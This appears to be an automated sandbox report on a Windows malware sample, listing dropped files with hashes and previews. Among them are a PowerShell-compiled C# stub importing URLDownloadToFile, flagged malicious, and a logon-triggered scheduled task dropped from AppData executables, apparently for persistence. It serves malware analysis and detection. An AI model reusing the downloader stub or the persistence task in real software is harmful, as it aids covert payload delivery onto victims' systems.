                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                    Category:dropped
                                                                    Size (bytes):7440
                                                                    Entropy (8bit):5.6312448977812695
                                                                    Encrypted:false
                                                                    SSDEEP:96:PV1Ipi7blJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHDx:PVxvTNAK4oOIGbK1RvVwPAWmOHDx
                                                                    MD5:DEA1DEA8BEA479821FA2AC1C565B6E56
                                                                    SHA1:86865637336A9FEFA98AC5ABD189A848BE8852D4
                                                                    SHA-256:64832E2264B5A851EE2CC7E048DA437D6F41B1C3DCAA385971DAA1B502A11125
                                                                    SHA-512:1E1858F58748BF88DAB254F524943AC2C8576B4546AA67E37DFFE8917396A1CCCBA3964554AA77C599DD1CA184A56B8AFC3406A14C880A1B88D163EB04BACA1C
                                                                    Malicious:false
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Microsoft Excel 2007+
                                                                    Category:dropped
                                                                    Size (bytes):24052
                                                                    Entropy (8bit):7.652425367216495
                                                                    Encrypted:false
                                                                    SSDEEP:384:EaNYaTXe5BPJ2cpRYnyAt3TtsVaWtmGJA8+6qdPGlDLRoucPQFVJG:Ea6aje5BP7RMYt9h44wQFV4
                                                                    MD5:AE24ADB29E22854D176245019B60E937
                                                                    SHA1:28E9F74782AA0D138EE52E3191248F827BF27A1D
                                                                    SHA-256:5BF5C455288A0B5184B23744506939B604BF402E346AFAE18269BBE888412129
                                                                    SHA-512:10AE2624E874CBA663DA08AA0C0FEBE19421FD01F72D54957F22A028A58A33BD4078C6A9CCA7CDAB94FC59030894BEA018141E6920AF4E926155C7EE49B6507D
                                                                    Malicious:false
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:gAWY3n:qY3n
                                                                    MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                    SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                    SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                    SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]..ZoneId=3..
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 06:56:43 2024, 1st section name ".debug$S"
                                                                    Category:dropped
                                                                    Size (bytes):1328
                                                                    Entropy (8bit):3.9873331651804085
                                                                    Encrypted:false
                                                                    SSDEEP:24:HVe9EurU8z4SdHZwKdNWI+ycuZhNpakSXPNnqSqd:crUMiKd41ulpa3FqSK
                                                                    MD5:FC26452EC282394A181D29F33ACFEE80
                                                                    SHA1:D9285273ED9FAFE656EEE56B98B721EC73EC7430
                                                                    SHA-256:AAC67BD2C00E4FF3177F24BE801BF260FB50392498CFDC643AFCE4560A0F22D9
                                                                    SHA-512:0C2295906B4D1A31B7FFC5E5A431501E231E15D8FC448F858EF69A3BA959599E22596FBD3002A7AEE61DC88B1456B551B0EB397BFF420B72D3706FD1B139A99A
                                                                    Malicious:false
                                                                    Preview:L...+.=g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP..................!.....O...............4.......C:\Users\user\AppData\Local\Temp\RES37A5.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.4.i.k.0.b.i.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 06:57:14 2024, 1st section name ".debug$S"
                                                                    Category:dropped
                                                                    Size (bytes):1328
                                                                    Entropy (8bit):4.000351085939844
                                                                    Encrypted:false
                                                                    SSDEEP:24:Hxke9E2UYGmdH9wKdNWI+ycuZhNQlgakSplFPNnqSqd:ys+Kd41ulwga3LfqSK
                                                                    MD5:EE1812B0038CEC23B728DEDE2C53289C
                                                                    SHA1:2EE43AE1B8F407AD89F8BEB939DBE2A9AC3CFA58
                                                                    SHA-256:DDE57C762C2206AF2F11E011364C4438094FDEF2C9AC9919E2D01D4660B016ED
                                                                    SHA-512:77DF995752F4B5A5FA8AC72EC22D233D3864F00A157ABEC4620CC0B2C6BDDA659ACE7C67D77664E0220E6FBBCA7668CC624C2D379CD93FCE660335DE06DA32B6
                                                                    Malicious:false
                                                                    Preview:L...J.=g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP................J&.........W..........4.......C:\Users\user\AppData\Local\Temp\RESB0AA.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.p.w.v.v.p.v.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:MSVC .res
                                                                    Category:dropped
                                                                    Size (bytes):652
                                                                    Entropy (8bit):3.069001916388609
                                                                    Encrypted:false
                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grybak7YnqqXPN5Dlq5J:+RI+ycuZhNpakSXPNnqX
                                                                    MD5:EF02218BC8B387D1D94F1AEAC393C2F2
                                                                    SHA1:98C48B3169B4B9DF113639A7D43F291E5DC24C7D
                                                                    SHA-256:9AB05741A14B35590044F3DA9DDABBD1C34BFFF49EA010F742069D4C11DB3CF1
                                                                    SHA-512:2909E2C49DD7605D95A2F70F6A963AF8CFB8F221BF717516BB6BB85E7413F3946125882C03BF15299F62DB8633F71434E30273AC92616032BA8C617FFDBF3793
                                                                    Malicious:false
                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.4.i.k.0.b.i.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.4.i.k.0.b.i.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (372)
                                                                    Category:dropped
                                                                    Size (bytes):484
                                                                    Entropy (8bit):3.8560947564999073
                                                                    Encrypted:false
                                                                    SSDEEP:6:V/DsYLDS81zu9l3NPMGHvQXReKJ8SRHy4HXQrBSOscVdmevvIy:V/DTLDfuhAXfHDQjmeYy
                                                                    MD5:FE82050659A8B97690D60529499222C1
                                                                    SHA1:7CC50135852B46DD1E36F2FF98506613DB525A68
                                                                    SHA-256:64C38563C4588B718B03AEC685677F173456D3C961EF97CD95E7784EE1E51A6A
                                                                    SHA-512:59356FD5CBB38A06BF09E182B8ED7C7C2200E6F8DE8E950BE38BEE0C45AA96B2DBF202BDC56097A74ACC4E0A8BC601558E83C098A376630CFA1BCCE64133D64F
                                                                    Malicious:false
                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace WPfW.{. public class dXGM. {. [DllImport("urlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZPntVsRhAh,string MyjpqIkQwDb,string ujQQpSXoIWy,uint M,IntPtr aYypvlykpe);.. }..}.
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):369
                                                                    Entropy (8bit):5.21731285206851
                                                                    Encrypted:false
                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f8mnJUzxs7+AEszIP23f8m99:p37Lvkmb6KzUVWZEoUm9
                                                                    MD5:B59FB14C6A5755BC87DC8767D179D21E
                                                                    SHA1:0F1EEAD7BB6EC4EE979C95A17AFF98D57C2128CF
                                                                    SHA-256:9E2F7B369F686CB62E14ACF7FFFDCBADB4C99DDF98DE3AAAA6D224EF16EBDF5E
                                                                    SHA-512:569AC12F950AC9D291C0C563CF0106233DB45488985F6172F23A03D43828F7B458895B5FB24A6EA5029A65EC6AC6FD8B0BFDFB67ACC091FB50041A5AC368A1C7
                                                                    Malicious:true
                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.0.cs"
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):3072
                                                                    Entropy (8bit):2.8459875563298698
                                                                    Encrypted:false
                                                                    SSDEEP:24:etGSjPBG5eAdF8qdd/ka5AYy/oTqtkZf6m8NMEWI+ycuZhNpakSXPNnq:6EsAdeqZguJpsMn1ulpa3Fq
                                                                    MD5:0E37B0F7E7060B37BB2F879D7D03172A
                                                                    SHA1:E92CD4BE97D6034B15FB93CDE310723FEE9A9013
                                                                    SHA-256:2BB13F33F680D74E00B19953D109499F4677A6BC25E709A8FC8F69E98BB31F9E
                                                                    SHA-512:6263D0E3D28293FB64B16611C2E57F5157491108E19467BEE572D7A5152E60A14405ABB0088035223D0808EA2F8932B1B413FC635E464DFBBD19762EB9486DA1
                                                                    Malicious:true
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+.=g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................1.*...................................................... 8.....P ......J.........P.....[.....g.....s.....u...J.....J...!.J.....J.......!.....*.......8.......................................!..........<Module>.i4
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                    Category:modified
                                                                    Size (bytes):866
                                                                    Entropy (8bit):5.320121512288153
                                                                    Encrypted:false
                                                                    SSDEEP:24:AId3ka6KzU6EoUm4KaMD5DqBVKVrdFAMBJTH:Akka60U6EoUFKdDcVKdBJj
                                                                    MD5:12AAB5BCCA39273130E3468C272765DB
                                                                    SHA1:973DDA98D1527879F0EC0C219673BCFDB228A5CF
                                                                    SHA-256:9D6D5DD1A51F459DFC73F2F9D8F9AC3DCD317C6E1144351DF4B93670D90F6D55
                                                                    SHA-512:4A3B5C416B27D1ABEF9A0C8C56499E1DCE64E3A4B3FFF764AB121AD43CACCB65DCA125610607E3B30F5905FABA414D94DA6202BAEDD2562174E73AAE94CDE15C
                                                                    Malicious:false
                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1579
                                                                    Entropy (8bit):5.115370849452323
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiNLxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTirv
                                                                    MD5:E058C7784A46B7B4C0F0C61CC4447BD0
                                                                    SHA1:AB5E4BF42CA677CB6B17B546A7FFAEF8CA48FE18
                                                                    SHA-256:AF631C42EE8C5A0CDB32DBB7658BBBE0A50324E81740669C9A30323D0B35A7D9
                                                                    SHA-512:402736C9A8FDA2732FD8004F9BCEE8543A6F2A5513D263271DE399B05C7B08AAEE914DD964F4FE58D7D4DACBE50BC8281224DDF9A95421C6E256E87335CCF75E
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                    Process:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1579
                                                                    Entropy (8bit):5.115370849452323
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiNLxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTirv
                                                                    MD5:E058C7784A46B7B4C0F0C61CC4447BD0
                                                                    SHA1:AB5E4BF42CA677CB6B17B546A7FFAEF8CA48FE18
                                                                    SHA-256:AF631C42EE8C5A0CDB32DBB7658BBBE0A50324E81740669C9A30323D0B35A7D9
                                                                    SHA-512:402736C9A8FDA2732FD8004F9BCEE8543A6F2A5513D263271DE399B05C7B08AAEE914DD964F4FE58D7D4DACBE50BC8281224DDF9A95421C6E256E87335CCF75E
                                                                    Malicious:true
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                    Process:C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1579
                                                                    Entropy (8bit):5.115370849452323
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiNLxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTirv
                                                                    MD5:E058C7784A46B7B4C0F0C61CC4447BD0
                                                                    SHA1:AB5E4BF42CA677CB6B17B546A7FFAEF8CA48FE18
                                                                    SHA-256:AF631C42EE8C5A0CDB32DBB7658BBBE0A50324E81740669C9A30323D0B35A7D9
